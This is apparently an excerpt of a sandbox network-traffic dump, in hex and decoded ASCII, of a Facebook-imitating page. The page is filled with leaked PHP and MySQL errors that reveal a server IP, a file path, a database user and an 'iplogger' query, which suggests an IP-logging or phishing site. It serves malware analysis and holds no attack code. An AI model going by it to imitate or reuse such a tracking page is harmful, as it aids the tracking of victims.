2022-10-07 13:59:47 UTC	915	IN	Data Raw: 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 Data Ascii: ssword:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00
2022-10-07 13:59:47 UTC	917	IN	Data Raw: 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 Data Ascii: ot;www_list_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20i
2022-10-07 13:59:47 UTC	918	IN	Data Raw: 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a Data Ascii: font%3E" onclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():
2022-10-07 13:59:47 UTC	920	IN	Data Raw: 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 Data Ascii: tabase.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Acce
2022-10-07 13:59:47 UTC	921	IN	Data Raw: 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 Data Ascii: user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20
2022-10-07 13:59:47 UTC	923	IN	Data Raw: 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 Data Ascii: 53C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u
2022-10-07 13:59:47 UTC	924	IN	Data Raw: 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 Data Ascii: 520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250
2022-10-07 13:59:47 UTC	926	IN	Data Raw: 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c Data Ascii: 0user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall
2022-10-07 13:59:47 UTC	927	IN	Data Raw: 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 Data Ascii: 00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resour
2022-10-07 13:59:47 UTC	929	IN	Data Raw: 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 Data Ascii: E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3C
2022-10-07 13:59:47 UTC	930	IN	Data Raw: 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c Data Ascii: ed\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\
2022-10-07 13:59:47 UTC	932	IN	Data Raw: 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 Data Ascii: 0253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogg
2022-10-07 13:59:47 UTC	933	IN	Data Raw: 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 Data Ascii: 3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A
2022-10-07 13:59:47 UTC	935	IN	Data Raw: 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 Data Ascii: 0253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/s
2022-10-07 13:59:47 UTC	936	IN	Data Raw: 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 Data Ascii: 53C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 6); return false;" title="Turkish">Trke</a></li><li><a
2022-10-07 13:59:47 UTC	937	IN	Data Raw: 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 Data Ascii: Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_US", &q
2022-10-07 13:59:47 UTC	939	IN	Data Raw: 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 20to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A
2022-10-07 13:59:47 UTC	940	IN	Data Raw: 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 Data Ascii: abase.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www
2022-10-07 13:59:47 UTC	942	IN	Data Raw: 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 Data Ascii: u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr
2022-10-07 13:59:47 UTC	943	IN	Data Raw: 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 0253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A
